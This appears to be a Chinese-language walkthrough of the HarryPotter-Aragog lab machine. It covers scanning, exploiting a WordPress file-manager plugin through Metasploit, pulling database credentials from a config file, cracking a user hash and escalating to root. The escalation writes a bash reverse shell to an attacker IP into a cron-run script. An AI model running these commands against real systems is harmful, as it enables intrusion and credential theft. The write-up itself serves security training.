HarryPotter-Aragog 三部曲之第一部 靶场记录

信息收集

刚开始使用arp-scan -l扫描靶机ip时发现怎么扫都扫不出来,后来发现是靶机的网卡不一致,需要我们手动修改
参考https://blog.csdn.net/qq_51524329/article/details/121808404第三种方法
成功扫描到靶机ip192.168.91.130
在这里插入图片描述
进行常规扫描

nmap -sT --min-rate 10000 -p- 192.168.91.130
nmap -sT -sV -sC -O -p22,80 192.168.91.130
nmap --script=vuln -p22,80 192.168.91.130

在这里插入图片描述
在这里插入图片描述
打开web界面只有一张图片
在这里插入图片描述
目录爆破发现有个192.168.91.130/blog
在这里插入图片描述
页面比较奇怪,在/etc/hosts中添加域名解析查看是否有变化
在这里插入图片描述
页面有所变化
在这里插入图片描述
在Notice中我们得到提示,WordPress的plugins(插件)可能有问题使用wpscan扫描一下插件有无可利用的漏洞。
发现一个login界面
在这里插入图片描述
使用wpscan扫描网站(需要在wpscan官网注册一个账号获取免费的token)

wpscan --api-token=免费获取的token --url=http://192.168.91.130/blog -e p --plugins-detection aggressive
//
-e p :枚举插件
--plugins-detection aggressive:主动枚举插件,在Notice中我们得到提示,插件有可能有问题

得到很长一串信息,其中发现wp-file-manager存在3个漏洞
在这里插入图片描述

漏洞利用

使用msf查找RCE漏洞
设置RHOSTS、LHOST、TARGETURI
在这里插入图片描述
成功通过msf进入到www-root

shell //进入shell环境
python -c 'import pty;pty.spawn("/bin/bash")'//提升交互性

新知识点:
由于wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录下的config-default.php 文件,打开发现数据库的root用户密码
在这里插入图片描述

mysql -u root -p
//账号 root 密码mySecr3tPass

连接数据库
在这里插入图片描述
在这里插入图片描述

得到一组数据
hagrid98
$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
//通过MD5解密获得密码
password123

在这里插入图片描述
连接ssh成功拿到第一个horcrux1.txt
在这里插入图片描述

提权

通过翻阅目录查询到/opt目录下有个.backup.sh文件
在这里插入图片描述
在这里插入图片描述
//cp -r:cp -r既复制当前目录下的文件,也复制当前目录下的文件夹。
//cp -R:-R只复制当前目录下的文件,不复制当前目录下的文件夹。

直接进行反弹shell

echo 'bash -i >& /dev/tcp/192.168.91.128/6666 0>&1' >/opt/.backup.sh

在这里插入图片描述
kali端监听

nc -lvnp 6666

在这里插入图片描述

总结:

1、常规扫描靶机ip,开放22,80端口,进入web页面,发现只有一张图片。
2、使用dirb来扫描网站,扫出了/blog和/blog/wp-login,发现页面显示不正常,需要在/etc/hosts添加域名解析。
3、根据提示,可能插件有问题,由于它是WordPress构建的网站,使用wpscan扫描(需要带token)查看是否有可利用漏洞
4、根据查看的可利用漏洞,我们通过msf进行搜索利用,成功连接进www-root。
5、WordPress搭建的网站默认数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件中,在里面找到了数据库的账号密码,进行连入;连入后发现了一个账号密码,密码经过MD5解密后成功使用ssh连入。
6、在hagrid98账号下我们拿到了第一个horcrux,在目录中搜寻的过程中,找到一个.backup.sh文件,查看发现脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行。
7、我们直接写入反弹shell后在kali端监听得到root权限,拿到horcrux

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值